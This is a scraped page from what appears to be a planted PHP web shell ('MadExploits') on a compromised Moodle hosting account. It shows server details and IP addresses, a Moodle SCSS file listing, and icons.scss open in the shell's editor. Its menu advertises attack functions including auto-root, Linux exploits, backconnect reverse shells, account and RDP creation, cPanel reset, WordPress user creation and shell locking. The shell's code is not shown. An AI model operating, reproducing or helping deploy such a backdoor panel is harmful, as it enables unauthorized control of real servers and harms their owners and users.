Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.38.64
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
theme /
boost /
scss /
moodle /
[ HOME SHELL ]
Name
Size
Permission
Action
admin.scss
12.58
KB
-rw-r--r--
atto.scss
4.23
KB
-rw-r--r--
backup-restore.scss
4.15
KB
-rw-r--r--
blocks.scss
8.39
KB
-rw-r--r--
bootstrap-rtl.scss
793
B
-rw-r--r--
bootswatch.scss
174
B
-rw-r--r--
buttons.scss
1.8
KB
-rw-r--r--
calendar.scss
12.57
KB
-rw-r--r--
chat.scss
2.25
KB
-rw-r--r--
contentbank.scss
2.81
KB
-rw-r--r--
core.scss
51.58
KB
-rw-r--r--
course.scss
23.63
KB
-rw-r--r--
dashboard.scss
144
B
-rw-r--r--
debug.scss
1.78
KB
-rw-r--r--
drawer.scss
3.93
KB
-rw-r--r--
editor.scss
62
B
-rw-r--r--
expendable.scss
826
B
-rw-r--r--
filemanager.scss
19.94
KB
-rw-r--r--
forms.scss
11.39
KB
-rw-r--r--
grade.scss
9.23
KB
-rw-r--r--
icons.scss
2.23
KB
-rw-r--r--
layout.scss
733
B
-rw-r--r--
login.scss
167
B
-rw-r--r--
message.scss
16.55
KB
-rw-r--r--
modal.scss
389
B
-rw-r--r--
modules.scss
37.45
KB
-rw-r--r--
popover-region.scss
9.93
KB
-rw-r--r--
prefixes.scss
1.21
KB
-rw-r--r--
print.scss
312
B
-rw-r--r--
question.scss
12.45
KB
-rw-r--r--
reports.scss
550
B
-rw-r--r--
search.scss
1.77
KB
-rw-r--r--
sticky-footer.scss
403
B
-rw-r--r--
tables.scss
1.38
KB
-rw-r--r--
templates.scss
238
B
-rw-r--r--
tool_usertours.scss
3.4
KB
-rw-r--r--
undo.scss
7.73
KB
-rw-r--r--
user.scss
5.09
KB
-rw-r--r--
variables.scss
710
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : icons.scss
// The only class we need for icons is .icon // Standardize the size, padding and alignment for all icons in Moodle. // Size of default icons. $icon-width: 16px; $icon-height: 16px; // Size of big icons. $icon-big-width: 64px; $icon-big-height: 64px; // stylelint-disable $iconsizes: () !default; $iconsizes: map-merge(( 0: 0, 1: ($icon-width * .25), 2: ($icon-width * .5), 3: $icon-width, 4: ($icon-width * 1.5), 5: ($icon-width * 2), 6: ($icon-width * 2.5), 7: ($icon-width * 3) ), $iconsizes); // stylelint-enable .icon { font-size: $icon-height; width: $icon-width; height: $icon-height; // vertical-align: middle; margin: 0; padding: 0; box-sizing: content-box; margin-right: 0.5rem; &.spacer { margin-right: 0; } &.iconsize-big { width: $icon-big-width; height: $icon-big-height; font-size: $icon-big-height; } } .navbar-dark a .icon { color: $navbar-dark-color !important; /* stylelint-disable-line declaration-no-important */ } .action-menu-item a:first-of-type > .icon { margin-left: 0.5rem; } // YUI 2 Tree View icons must not have a margin left. .ygtvcell .icon { margin-left: 0 !important; /* stylelint-disable-line declaration-no-important */ } // In the navigation, tree icons should not have margins. .block_navigation, .block_settings { .tree_item .icon { margin-left: 0; } } [data-action=toggle-drawer] .icon { margin: 0; } // Apply in special cases where the default icons styles does not work properly. Eg file picker buttons. .icon-no-spacing a > .icon { margin: 0; } .icon-no-margin { .icon { margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; } } .icon-large > .icon { width: ($icon-width * 2); height: ($icon-height * 2); } @each $size, $length in $iconsizes { .icon-size-#{$size} { .icon { height: $length !important; /* stylelint-disable-line declaration-no-important */ width: $length !important; /* stylelint-disable-line declaration-no-important */ font-size: $length !important; /* stylelint-disable-line declaration-no-important */ } } } .helplink .icon { margin-left: 0.5rem; }
Close